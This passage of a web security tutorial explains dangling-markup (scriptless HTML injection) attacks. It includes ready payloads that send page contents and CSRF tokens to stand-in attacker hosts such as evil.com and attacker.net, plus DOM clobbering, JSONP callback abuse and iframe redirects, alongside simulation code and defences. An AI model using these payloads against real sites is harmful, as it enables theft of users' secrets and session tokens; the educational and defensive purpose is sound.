Dangling Markup - HTML scriptless injection

and this input field will contain all the content between its opening double quote and the next double quote in the HTML (choose the quote character the rest of the page uses least, so the capture runs as far as possible). This attack mixes "Stealing clear text secrets" with "Stealing forms 2".

You can do the same thing by injecting a form and an `<option>` tag. Inside a `<select>` the parser ignores most start tags, so all the page text until a closing `</option>` (or `</select>`) is found becomes the option's text, which is submitted as its value. Be aware that an `<input>`, `<keygen>` or `<textarea>` start tag closes the `<select>` early, so the capture stops at the first such element in the page:

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option>

Form parameter injection

You can change the action of a form and insert new values so an unexpected action is performed. Injecting a `<form>` header with your own hidden inputs ahead of the legitimate form works because the parser ignores the nested `<form>` start tag: the legitimate fields, including the page's own CSRF token, become part of the injected form, so when the user submits it the server receives the attacker-chosen `invite_user` value together with a valid `xsrf_token`:

<form action='/change_settings.php'><input type='hidden' name='invite_user'   value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>

Stealing clear text secrets via noscript

`<noscript>` is a tag whose content is rendered only when the browser does not support JavaScript or has it disabled (you can enable/disable JavaScript in Chrome at chrome://settings/content/javascript). When scripting is enabled its content is treated as raw text, so the payload below only fires for users browsing with JavaScript off.

A way to exfiltrate the content of the web page from the point of injection to the bottom to an attacker-controlled site is to inject this (the `<textarea>` is never closed, so it swallows the rest of the document, and the invisible full-page submit button sends it wherever the user clicks):

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
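To see exactly what each of these payloads hands to the attacker, here is an added example, written for this page and not code from the original or from any project it describes. It simulates the tokenizer and tree-builder rules behind the unterminated-attribute capture and the `<select><option>` capture from the sections above, and the `<textarea>` capture used by the noscript payload. The victim page, the secret token, the `attacker.example` URL and all payloads are constructed for the demo.

```javascript
// Added example for this page, not code from the original or from any project it
// describes: a simulation of what each dangling-markup payload above captures,
// following the HTML tokenizer / tree-builder rules the attacks rely on.
// The victim page, the secret and the attacker URL are constructed for the demo.

const SECRET = 's3cr3t-csrf-token-1234';

// Victim page: untrusted input lands inside a <p>; the page itself only uses
// double quotes until a single-quoted href in the footer.
function victimPage(userInput) {
  return `<html><body>
<p class="review">${userInput}</p>
<form action="/change_settings.php" method="post">
<input type="hidden" name="xsrf_token" value="${SECRET}">
<input type="text" name="invite_user" value="">
<input type="submit" value="Save">
</form>
<footer><a href='/privacy'>Privacy</a></footer>
</body></html>`;
}

// 1. Unterminated quoted attribute. The tokenizer stays in the "attribute value
//    (quoted)" state until the same quote character appears, so tags and
//    newlines are swallowed into the value. Pick the quote the page uses least.
//    If EOF comes first the tag is never emitted, and nothing is captured.
function captureAttribute(html, injection, quote) {
  const at = html.indexOf(injection);
  if (at < 0) return null;                 // input did not land as raw markup
  const from = at + injection.length;
  const end = html.indexOf(quote, from);
  return end < 0 ? null : html.slice(from, end);
}

// 2. Raw-text capture. <textarea> is RCDATA: only a matching </textarea> end
//    tag stops it. For <option> inside <select>, the "in select" insertion mode
//    ignores most start tags (their text is kept) but an <input>, <keygen> or
//    <textarea> start tag closes the <select>, and <option>/<optgroup>/<select>
//    tags end the current option.
const TERMINATORS = {
  textarea: /<\/textarea[\s\/>]/i,
  option: /<\/?(?:option|optgroup|select)[\s\/>]|<(?:input|keygen|textarea)[\s\/>]/i,
};
function captureRawText(html, injection, element) {
  const at = html.indexOf(injection);
  if (at < 0) return null;
  const from = at + injection.length;
  const m = TERMINATORS[element].exec(html.slice(from));
  return m ? html.slice(from, from + m.index) : html.slice(from);
}

// Defence: contextual output encoding. Once quotes and angle brackets are
// entity-encoded, the input can neither close the <p> nor open a tag, so no
// capture can start.
function encodeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Constructed payloads; attacker.example is a placeholder.
const ATTR_INJECTION = '<form action="https://attacker.example/log"><input type="hidden" name="leak" value=\'';
const TEXTAREA_INJECTION = '<form action="https://attacker.example/log"><input type="submit"><textarea name="contents">';
const OPTION_INJECTION = '<form action="https://attacker.example/log"><input type="submit"><select name="xss"><option>';

function demo() {
  return {
    attr: captureAttribute(victimPage(ATTR_INJECTION), ATTR_INJECTION, "'"),
    textarea: captureRawText(victimPage(TEXTAREA_INJECTION), TEXTAREA_INJECTION, 'textarea'),
    option: captureRawText(victimPage(OPTION_INJECTION), OPTION_INJECTION, 'option'),
    encoded: captureAttribute(victimPage(encodeHtml(ATTR_INJECTION)), ATTR_INJECTION, "'"),
  };
}
```

Running `demo()` shows the differences that matter in practice: the single-quoted attribute and the `<textarea>` both capture the hidden CSRF token, the `<option>` variant stops at the page's first `<input>` and misses it, and the encoded input captures nothing because no tag is ever opened. Beyond output encoding, `Content-Security-Policy: form-action 'self'` stops every form-based variant from submitting to the attacker's origin, although it does nothing against the injection itself.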

Bypassing CSP with user interaction

From this PortSwigger research ("Evading CSP with DOM-based dangling markup") you can learn that even in the most CSP-restricted environments you can still exfiltrate data with some user interaction. On this occasion we are going to use the payload:

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>

The rest of the payload makes the injected markup end up in `window.name` of the window the link opens, so `payload.html` on the attacker's site only has to read `window.name` back and send it home:

<script>
... + encodeURIComponent(window.name);
</script>

Misleading script workflow 1 - HTML namespace attack

Insert a new tag with an id inside the HTML that shadows a later element with the same id: `document.getElementById` returns the first match in document order, so the script reads the injected element's value instead of the legitimate one. In this example the script selects with whom a status update is going to be shared:

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
  ...
  request.share_with = document.getElementById('share_with').value;
  ...
}

Misleading script workflow 2 - Script namespace attack

Create variables inside the JavaScript global namespace by inserting HTML tags (DOM clobbering): elements with an `id` are exposed as properties of `window`, so an undeclared `is_public` resolves to the injected `<img>` element. An element is truthy, so any read of the variable that happens before the script assigns it sees "true"; in old Internet Explorer even the assignment itself failed, as the annotations show. This variable then affects the flow of the application:

<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
  ...
  if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
    is_public = true;
  else
    is_public = false;
}

function submit_new_acls() {
  ...
  if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
  ...
}

Abuse of JSONP

If you find a JSONP interface you may be able to call an arbitrary function with arbitrary data: the callback parameter (`call` here) names the function the returned script invokes, and the script runs in the origin of the page that includes it, so an injected `<script src>` can invoke any function the victim page already defines:

<script src='/editor/sharing.js'>:              ← Legitimate script
  function set_sharing(public) {
    if (public) request.access_mode = AM_PUBLIC;
    else request.access_mode = AM_PRIVATE;
    ...
  }

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
  set_sharing({ ... })

Or, if the endpoint does not restrict the callback to a plain identifier, you can even try to execute some JavaScript:

<script src='/search?q=a&call=alert(1)'></script>
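The two JSONP abuses above fail at different layers, which is easy to get wrong when hardening an endpoint. The following added example, written for this page and not code from the original or from any project it describes, models the `/search?q=a&call=...` responder in its injectable form and in a hardened form; the data, the callback names and the allowlist are hypothetical.

```javascript
// Added example, not code from the original page: a JSONP responder modelled on
// the /search?q=a&call=... interface, injectable and hardened. Names, data and
// the allowlist are hypothetical.

const SAMPLE = { q: 'a', results: ['alice', 'bob'] };

// Vulnerable: the callback parameter is echoed into the script body verbatim.
// call=alert(1) yields `alert(1)({...});` (arbitrary JavaScript), and
// call=set_sharing lets an injected <script src=/search?...> invoke any
// function the victim page already defines, with the search results as argument.
function renderJsonpUnsafe(callback, data) {
  return `${callback}(${JSON.stringify(data)});`;
}

// Step 1: syntactic check. A dotted JavaScript identifier cannot carry "(", ")"
// or operators, so alert(1) is rejected. This alone does NOT stop the namespace
// attack: set_sharing (or window.alert) is a perfectly valid identifier.
const IDENTIFIER = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

// Step 2: allowlist the callbacks this endpoint was built for. Functions the
// victim application happens to define elsewhere are not on it.
const ALLOWED_CALLBACKS = new Set(['renderSearchResults', 'jQuery_cb']);

function classify(callback) {
  if (!IDENTIFIER.test(callback)) return 'rejected-syntax';
  if (!ALLOWED_CALLBACKS.has(callback)) return 'rejected-allowlist';
  return 'allowed';
}

function renderJsonpSafe(callback, data) {
  const verdict = classify(callback);
  if (verdict !== 'allowed') throw new Error(`JSONP callback ${verdict}`);
  // U+2028/U+2029 are legal in JSON but were line terminators in JavaScript
  // before ES2019; escape them so the literal cannot break out of the call.
  const json = JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return {
    // Script MIME type plus nosniff, and a /**/ prefix (the Rosetta Flash
    // mitigation) so the response never starts with caller-chosen bytes.
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/${callback}(${json});`,
  };
}
```

The identifier check closes the `alert(1)` vector only; the `set_sharing` vector survives any purely syntactic filter and is closed by the allowlist. The cleanest fix is to retire JSONP altogether in favour of JSON over CORS, which cannot be loaded through an injected `<script>` tag.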

Iframe abuse

Notice that a child document can set the `location` property of its parent and top-level window even when it is cross-origin. This means that you can make the client navigate to any other page by loading, inside an iframe, some code like:

<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>

This can be mitigated with the `sandbox` attribute on the iframe, as long as `allow-top-navigation` is not granted: `<iframe sandbox="allow-scripts" src="...">` lets the framed script run but blocks it from navigating the top-level page (`allow-top-navigation-by-user-activation` relaxes this only for navigations triggered by a user gesture).

You could also use `<meta http-equiv>` to perform several actions, such as a redirect via `http-equiv="refresh"` (after 5 seconds in this case). Older browsers also honoured `http-equiv="Set-Cookie"` to set a cookie, but current browsers ignore it.

CSP does not help here: there is no `http-equiv` directive, and `default-src 'self'` does not govern navigations triggered by a meta refresh. The reliable defence is to prevent the markup injection itself with contextual output encoding of untrusted input.

New <portal> tag

There is very interesting published research on exploitable vulnerabilities of the `<portal>` tag. At the time of writing you had to enable the portal tag in Chrome at chrome://flags/#enable-portals or it would not work; the element was never shipped enabled by default and is not part of the HTML standard.
